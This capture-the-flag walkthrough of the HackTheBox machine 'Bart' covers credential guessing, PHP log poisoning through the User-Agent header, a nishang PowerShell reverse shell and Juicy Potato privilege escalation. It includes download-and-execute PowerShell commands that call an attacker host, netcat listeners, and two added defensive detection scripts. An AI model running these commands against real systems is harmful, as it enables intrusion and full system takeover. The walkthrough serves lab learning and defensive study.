Bart HTB

IP

10.10.10.81

Initial Nmap scan

sudo nmap -sV -sC -A -oA initial_nmap 10.10.10.81

Full Nmap scan

nmap -sV -p- -oA full_nmap_scan 10.10.10.81
  • Nothing new

Ports

80: HTTP

  • we can see that nmap did not follow the redirect, so let's add the domain it redirects to (bart.htb) to our hosts file

sudo vi /etc/hosts

To exit out of vim (just in case):

Esc # leave insert mode
:wq # write and quit

Now that we have added the entry to the hosts file, let's direct our attention to port 80 (HTTP)

Port 80 HTTP

When we first land on the page, Wappalyzer shows us the technologies the web server is using

From what we can tell, this web server:

  • uses WordPress version 4.8.2

  • Has a MySQL database

  • Uses PHP

  • is an IIS server (Windows)

First thing let's perform some directory busting

feroxbuster -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.81 -x php -o dirs.txt

Let's let this run in the background

Quick note

  • While running feroxbuster I noticed I started to get a lot of 200 status codes, and all of them resulted in the following

  • Don't get me wrong, I love meerkats as much as the next person, but I don't want this showing up in my results, so let's modify our command a touch

feroxbuster -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.81 -x php -C 200 -o dirs.txt

  • -C 200: filter out (exclude) responses with status code 200 from the results

  • let's let this run for a bit and come back to it later

Looking at the home page's source we can see some interesting notes left behind

We can make out some possible usernames

Harvey Potter
Developer@BART
h.potter@bart.htb

Looking through the main web page, we can see a few other staff members:

Samantha Brown: CEO@bart
Daniel Simmons
Robert Hilton
Jane Doe: Developer@FluffyUnicorns

feroxbuster found a directory

/monitor/

So far we know that it is running

  • PHP Server Monitor v3.2.1

We couldn't find any default creds, but if we look at the forgotten password section and submit admin

we can see that the response tells us whether a particular user exists on the system (username enumeration)

Let's refer to the staff we found on the web page and in the page's source

Woohoo! We found a user

If we try Harvey's last name, potter, as the password we are authenticated

Looks like it worked, but we'll have to add the subdomain it redirects to into our hosts file

Now we can log back in with Harvey's credentials

harvey: potter

If we look at the Servers tab we can see another subdomain

For good measure, let's add this to our hosts file too

When we navigate to

http://internal-01.bart.htb/

we are greeted with another login screen

As you can probably guess, Harvey's creds don't work here; we need a password with a minimum of eight characters

Let's perform further directory busting

feroxbuster -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://internal-01.bart.htb/simple_chat/ -x php -o dirs.txt

We keep getting server errors, most likely because we are not authenticated

Let's try some common creds with harvey

  • it actually worked

We found the creds for the login

harvey: Password1

When we log into the chat we can see the following

From the conversation there seems to be development code on the server; if we look at the page source

this looks promising

Let's navigate to

http://internal-01.bart.htb/log/log.php?filename=log.txt&username=harvey

My first thought was that it looks pretty static, but playing around with the URL parameters

we do get a response back

I wonder if we can add any further functionality to it

Let's use Burp and catch a request

Looking at the request, I did try to modify both the filename and username parameters to see if I could inject PHP code, but with no luck

but we can successfully inject PHP code within the User-Agent header

Before we send this off we want to send it through Repeater. Now we can add the parameter cmd= and execute commands on the target system

We now have code execution on the target machine
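As an added defensive example (not part of the original write-up), the check below scans IIS-style W3C access log lines for the two signs of the log-poisoning chain described above: PHP open tags arriving in the User-Agent header, and a cmd parameter being passed to the log viewer script. The log format, the sample lines and the safe_log_value helper are constructed assumptions; the log viewer path /log/log.php is the one from the write-up.

```python
"""Defensive check for PHP log-poisoning attempts (added example, not from the write-up)."""
import html
import re
from urllib.parse import parse_qs, unquote_plus

# Anything that opens a PHP block if the log file is later parsed by the PHP engine.
PHP_OPEN_TAG = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)

# Scripts that echo user-supplied log content back through PHP (path from the write-up).
LOG_VIEWER_PATHS = {"/log/log.php"}

# Constructed sample in IIS W3C extended format (assumption: these fields are logged;
# IIS writes spaces inside cs(User-Agent) as '+', which unquote_plus reverses).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services
#Fields: date time cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2018-02-20 10:01:12 GET /log/log.php filename=log.txt&username=harvey 200 Mozilla/5.0+(Windows+NT+10.0)+Firefox/58.0
2018-02-20 10:01:40 GET /log/log.php filename=log.txt&username=harvey 200 <?php+echo+'poisoned';+?>
2018-02-20 10:02:05 GET /log/log.php filename=log.txt&username=harvey&cmd=whoami 200 Mozilla/5.0
2018-02-20 10:02:30 GET /index.php - 200 %3C%3Fphp+echo+1%3B+%3F%3E
2018-02-20 10:03:00 GET /monitor/ - 200 curl/7.58.0
"""


def parse_w3c(text):
    """Yield one dict per request line, keyed by the names in the #Fields directive."""
    fields = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or fields is None:
            continue  # other directives, or data before any #Fields line
        values = line.split()
        if len(values) != len(fields):
            continue  # malformed line: skip rather than mis-assign columns
        yield dict(zip(fields, values))


def find_poisoning(text):
    """Return (record_no, reason, decoded_value) for every suspicious request."""
    findings = []
    for n, rec in enumerate(parse_w3c(text), start=1):
        ua = unquote_plus(rec.get("cs(User-Agent)", "-"))
        query = rec.get("cs-uri-query", "-")
        stem = rec.get("cs-uri-stem", "")
        if PHP_OPEN_TAG.search(ua):
            findings.append((n, "php_tag_in_user_agent", ua))
        # parse_qs percent-decodes on its own; '-' (no query) yields an empty dict
        if stem in LOG_VIEWER_PATHS and "cmd" in parse_qs(query):
            findings.append((n, "cmd_param_sent_to_log_viewer", unquote_plus(query)))
    return findings


def safe_log_value(value):
    """Mitigation on the application side: entity-encode request data before it is
    written to a log that PHP may later include, so '<?php' can never be parsed."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    for record_no, reason, value in find_poisoning(SAMPLE_LOG):
        print(f"record {record_no}: {reason}: {value!r}")
```

The detector decodes the User-Agent before matching, since IIS stores it URL-encoded; the encoding-side fix (safe_log_value) is the complement of never handing a user-controlled path to include in the first place.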

Establishing a shell on the target system

Alright, let's set up our shell

  1. we will use the nishang repo

https://github.com/samratashok/nishang.git

  2. copy our reverse shell script into our working directory

cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 ./rev.ps1

  3. edit our Invoke-PowerShellTcp.ps1 script (rev.ps1)

we just added this little snippet so when the PowerShell script is executed it will automatically connect to our local machine

  4. set up our python server

python3 -m http.server 9010

  5. set up our netcat listener

nc -lvnp 9001

  6. from Burp let's pick up our rev.ps1

Quick tip

  • Once you have typed your PowerShell command out, highlight the command and press Ctrl+U to URL-encode it

  7. we have a shell on the system

Privilege escalation via iusr

Let's run systeminfo and feed it to WES-NG (Windows Exploit Suggester - Next Generation) to see if we can find any exploits

Copy and paste the output to a file on our local machine

Update WES

python3 /opt/wesng/wes.py --update

Let's feed it to WES

python3 /opt/wesng/wes.py systeminfo.txt > possible_exploits

It found a number of exploits, but we will keep these in our back pocket in case we can't find anything easier

Let's check for users on the system

net users

Let's check our privileges

whoami /priv

As we can see, SeImpersonatePrivilege is enabled, meaning we have a high chance of successfully using Juicy Potato to spawn a shell as NT AUTHORITY\SYSTEM.
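As an added defender-side check (not from the write-up), the script below parses the output of whoami /priv, as run above, and flags enabled privileges that let a process obtain and impersonate other accounts' tokens. The sample output is constructed, and the watch-list of privileges is an assumption based on which ones are commonly abused for local privilege escalation.

```python
"""Audit 'whoami /priv' output for impersonation-class privileges (added example)."""
import re

# Privileges that let a compromised service account escalate (assumed watch-list):
# the first two are the ones the Potato family of token-impersonation tools needs.
HIGH_RISK_PRIVILEGES = {
    "SeImpersonatePrivilege": "impersonate a client after authentication",
    "SeAssignPrimaryTokenPrivilege": "replace a process-level token",
    "SeDebugPrivilege": "debug (and open) any process",
    "SeBackupPrivilege": "read any file regardless of ACL",
    "SeRestorePrivilege": "write any file regardless of ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeLoadDriverPrivilege": "load kernel drivers",
}

# Constructed sample of what 'whoami /priv' prints for an IIS application-pool account.
SAMPLE_WHOAMI_PRIV = """\

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Name column, free-text description, then the State column at the end of the line.
PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$")


def parse_whoami_priv(text):
    """Return {privilege_name: state} from the table that whoami /priv prints."""
    privs = {}
    for line in text.splitlines():
        m = PRIV_LINE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(2)
    return privs


def risky_enabled(privs):
    """Names of enabled privileges on the watch-list, sorted for stable output."""
    return sorted(name for name, state in privs.items()
                  if state == "Enabled" and name in HIGH_RISK_PRIVILEGES)


def report(text):
    """One line per finding, e.g. for a ticket or a detection rule's message field."""
    return [f"{name}: {HIGH_RISK_PRIVILEGES[name]}"
            for name in risky_enabled(parse_whoami_priv(text))]


if __name__ == "__main__":
    for line in report(SAMPLE_WHOAMI_PRIV) or ["no high-risk privileges enabled"]:
        print(line)
```

The usual mitigations on the defending side are to run web application code under an account that does not hold SeImpersonatePrivilege where the application allows it, to keep the OS patched, and to alert on unexpected child processes spawned by the web server worker process.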

Alright, let's download some fresh potatoes and get to it

Once we have the Juicy Potato executable on our local machine, let's download it onto the target machine

  1. start a python3 server

python3 -m http.server 9010

  2. we'll use PowerShell to retrieve the potato

(new-object net.webclient).downloadfile('http://10.10.16.8:9010/jp.exe', 'C:\Users\Public\Downloads\jp.exe')

We should now have our jp.exe (JuicyPotato.exe) within the Downloads directory

Let's execute jp.exe and see what parameters we need to set

  • -t: CreateProcess call to use; with * we let it try both

  • -p: program to launch; we will execute a shell.bat file

  • -l: COM server listen port; this can be, say, port 4444 on the local host

  • -c: CLSID; since we know we are working on a Windows 10 Pro machine we can use the CLSID list published in the Juicy Potato repository to test possible CLSIDs, and we'll use {7A6D9C0A-1E7A-41B6-82B4-C3F7A27BA381}

Alright, let's get our reverse shell ready

  • we'll just copy it: cp rev.ps1 rev2.ps1

  • change the port for the connection

Now we want to create a shell.bat file which will run our rev2.ps1; it should contain

powershell -c iex(new-object net.webclient).downloadstring('http://10.10.16.8:9010/rev2.ps1')

Let's download our shell.bat onto the target machine

  • set up a python server

python3 -m http.server 9010

  • from the target machine

(new-object net.webclient).downloadfile('http://10.10.16.8:9010/shell.bat', 'C:\Users\Public\Downloads\shell.bat')

  • start a netcat listener

nc -lvnp 9002

Alright, we should now have the necessary files on the target system

Let's execute jp.exe

./jp.exe -t * -p shell.bat -l 4444 -c "{7A6D9C0A-1E7A-41B6-82B4-C3F7A27BA381}"

We have a shell as NT AUTHORITY\SYSTEM
